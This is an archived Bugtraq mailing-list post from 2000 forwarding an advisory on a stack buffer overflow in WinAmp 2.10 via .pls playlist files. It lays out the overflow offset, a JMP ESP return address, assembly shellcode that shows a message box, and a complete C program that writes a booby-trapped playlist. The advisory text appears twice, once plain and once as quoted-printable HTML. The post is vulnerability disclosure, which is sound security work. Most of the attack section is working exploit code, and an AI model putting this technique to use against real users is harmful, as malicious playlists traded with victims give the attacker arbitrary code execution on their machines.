[13297] in bugtraq
Buffer overflow with WinAmp 2.10
daemon@ATHENA.MIT.EDU (Transfer Interrupted)
Mon Jan 10 19:39:29 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="_=XFMail.1.4.0.Linux:000109112131:762=_"
Message-Id: <XFMail.000109112131.t-i@gmx.net>
Date: Sun, 9 Jan 2000 11:21:31 +0100
Reply-To: t-i@gmx.net
From: Transfer Interrupted <t-i@GMX.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format
--_=XFMail.1.4.0.Linux:000109112131:762=_
Content-Type: text/plain; charset=us-ascii
Hi!
There's a stack based buffer overflow in WinAmp 2.10 (Win 98) which allows an user to
execute arbitrary code. Here's the source code and some better intro!
Be careful,
Transfer Interrupted
--
"This vulnerability is completely theoretical!"
-Microsoft
--_=XFMail.1.4.0.Linux:000109112131:762=_
Content-Disposition: attachment; filename="winamp.win98.txt"
Content-Transfer-Encoding: 7bit
Content-Description: winamp.win98.txt
Content-Type: text/plain;
charset=us-ascii; name=winamp.win98.txt; SizeOnDisk=13229
Author: Steve Fewer, darkplan@oceanfree.net
http://indigo.ie/~lmf
Introduction:
I recently uncovered a stack based buffer overflow in winamp
version 2.10 which lets me execute 'arbitrary code'. It is=20
carried out through .pls files which winamp uses for playlists.=20
This is unnerving as it is a feasible plan to trade playlists on
irc during a mp3 trading session with someone.
The overflow occurs when an entry greater than 580 bytes is=20
read in from a .pls file. The EIP is the only register overwritten=20
in the next four bytes that follow, from there on is space for=20
your shell code. eg.
[playlist]
File1=3D<580 bytes><eip><shell code>
NumberOfEntries=3D1 =20
The first 580 bytes get mangled around in memory but the 585=20
byte (where our shell code starts) is pointed to by the ESP,=20
therefore a simple 'JMP ESP' or the like will land us back in=20
our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in=20
comctl32.dll which winamp loads. Pointing our EIP into that=20
address lands us back where we want to be.=20
This was all created/tested on Windows 98 [Version 4.10.1998]
running on an Intel PII400 with 128MB RAM.
The Shell Code:
The shell code I wrote for this simply displays a message box=20
and then calls exit(). However Winamp doesn't load msvcrt.dll=20
which is needed to call exit() so we have to load it ourselves.=20
I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
LoadLibraryA(). For calling Messagebox I used the address=20
0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I=20
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It=20
didn't warrant using GetProcAddress for compatibilities sake.
For the OP codes see the exploit further on.
// This loads msvcrt.dll
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0xBFF776D4
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
// This calls MessageBox to say 'Hi!'
push ebp
mov ebp,esp
xor edi,edi
push edi
mov byte ptr[ebp-04h],48h
mov byte ptr[ebp-03h],69h
mov byte ptr[ebp-02h],21h
mov edx, 0xBFF5412E
push edx
push edi
lea edx,[ebp-04h]
push edx
push edx
push edi
call dword ptr[ebp-08h]
// This calls exit()
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]
The Exploit:
<-snip->
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/
#include <stdio.h>
int main()
{
printf("\n\n\t\t.......................................\n");
printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
printf("\t\t.......................................\n");
printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
printf("\t\t.........http://indigo.ie/~lmf.........\n");
printf("\t\t.......................................\n\n");
char buffer[640];
char eip[8] =3D "\xF7\xCF\xB9\xBF";
char sploit[256] =3D =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\=
xFA\x2E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\=
x45\xF4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\=
x45\xFE\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\=
xEC\xBA\xFF
\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int x=3D0;x<580;x++)
{
buffer[x] =3D 0x90;
}
file =3D fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=3D");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=3D1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
<-snip->
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
------=_NextPart_000_0029_01BF56CF.4A7BA760
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20
advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20
Steve Fewer, <A=20
href=3D"mailto:darkplan@oceanfree.net">darkplan@oceanfree.net</A><BR>&nbs=
p;  =
; =20
<A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>-=3D-=3D-=3D-=
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based =
buffer overflow=20
in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20
<BR>carried out through .pls files which winamp uses for playlists. =
<BR>This is=20
unnerving as it is a feasible plan to trade playlists on<BR>irc during a =
mp3=20
trading session with someone.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry =
greater than 580=20
bytes is <BR>read in from a .pls file. The EIP is the only register =
overwritten=20
<BR>in the next four bytes that follow, from there on is space for =
<BR>your=20
shell code. eg.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D<580=20
bytes><eip><shell code><BR>NumberOfEntries=3D1 =
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around =
in memory=20
but the 585 <BR>byte (where our shell code starts) is pointed to by the =
ESP,=20
<BR>therefore a simple 'JMP ESP' or the like will land us back in =
<BR>our shell=20
code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which =
winamp=20
loads. Pointing our EIP into that <BR>address lands us back where we =
want to be.=20
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows =
98 [Version=20
4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply =
displays a=20
message box <BR>and then calls exit(). However Winamp doesn't load =
msvcrt.dll=20
<BR>which is needed to call exit() so we have to load it ourselves. =
<BR>I used=20
the address 0xBFF776D4 in kernel32.dll (v4.10.1998) =
for<BR>LoadLibraryA(). For=20
calling Messagebox I used the address <BR>0xBFF5412E in user32.dll =
(v4.10.1998)=20
and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20
(v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for =
compatibilities=20
sake.<BR>For the OP codes see the exploit further on.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> // This loads=20
msvcrt.dll<BR> push ebp<BR> mov=20
ebp,esp<BR> xor eax,eax<BR> push=20
eax<BR> push eax<BR> push=20
eax<BR> mov byte =
ptr[ebp-0Ch],4Dh<BR> mov=20
byte ptr[ebp-0Bh],53h<BR> mov byte=20
ptr[ebp-0Ah],56h<BR> mov byte=20
ptr[ebp-09h],43h<BR> mov byte=20
ptr[ebp-08h],52h<BR> mov byte=20
ptr[ebp-07h],54h<BR> mov byte=20
ptr[ebp-06h],2Eh<BR> mov byte=20
ptr[ebp-05h],44h<BR> mov byte=20
ptr[ebp-04h],4Ch<BR> mov byte=20
ptr[ebp-03h],4Ch<BR> mov =
edx,0xBFF776D4<BR> =20
push edx<BR> lea eax,[ebp-0Ch]<BR> =
push=20
eax<BR> call dword ptr[ebp-10h]<BR> =
// This=20
calls MessageBox to say 'Hi!'<BR> push=20
ebp<BR> mov ebp,esp<BR> xor=20
edi,edi<BR> push edi<BR> mov byte=20
ptr[ebp-04h],48h<BR> mov byte=20
ptr[ebp-03h],69h<BR> mov byte=20
ptr[ebp-02h],21h<BR> mov edx, =
0xBFF5412E<BR> =20
push edx<BR> push edi<BR> lea=20
edx,[ebp-04h]<BR> push edx<BR> push=20
edx<BR> push edi<BR> call dword=20
ptr[ebp-08h]<BR> // This calls =
exit()<BR> =20
push ebp<BR> mov ebp,esp<BR> mov=20
edx,0xFFFFFFFF<BR> sub =
edx,0x87FFAAFB<BR> =20
push edx<BR> xor eax,eax<BR> push=20
eax<BR> call dword ptr[ebp-04h]</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit =
for Winamp=20
v2.10<BR> * Author Steve Fewer, 04-01-2k. Mail me at <A=20
href=3D"mailto:darkplan@oceanfree.net">darkplan@oceanfree.net</A><BR>&nbs=
p;*<BR> *=20
For a detailed description on the exploit see my =
advisory.<BR> *<BR> *=20
Tested with Winamp v2.10 using Windows98 on an Intel<BR> * PII 400 =
with=20
128MB RAM<BR> *<BR> * <A=20
href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR> */</FON=
T></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#include <stdio.h></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> =20
printf("\n\n\t\t.......................................\n");<BR> &nb=
sp; =20
printf("\t\t......Nullsoft Winamp 2.10 =
exploit.....\n");<BR> =20
printf("\t\t.......................................\n");<BR> &=
nbsp;=20
printf("\t\t.....Author: Steve Fewer, =
04-01-2k.....\n");<BR> =20
printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR> &=
nbsp;=20
printf("\t\t.......................................\n\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20
"\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6=
\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\=
x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x=
bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF=
C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D=
\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\=
xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> for(int=20
x=3D0;x<580;x++)<BR> {<BR> =
buffer[x] =3D=20
0x90;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>file =3D =
fopen("crAsh.pls","wb");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>fprintf(file, =
"[playlist]\n");<BR>fprintf(file,=20
"File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20
eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20
"\nNumberOfEntries=3D1");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>fclose(file);<BR>printf("\t =20
created file crAsh.pls loaded with the exploit.\n");<BR>return=20
0;<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO=
DY></HTML>
------=_NextPart_000_0029_01BF56CF.4A7BA760--
--_=XFMail.1.4.0.Linux:000109112131:762=_--
End of MIME message
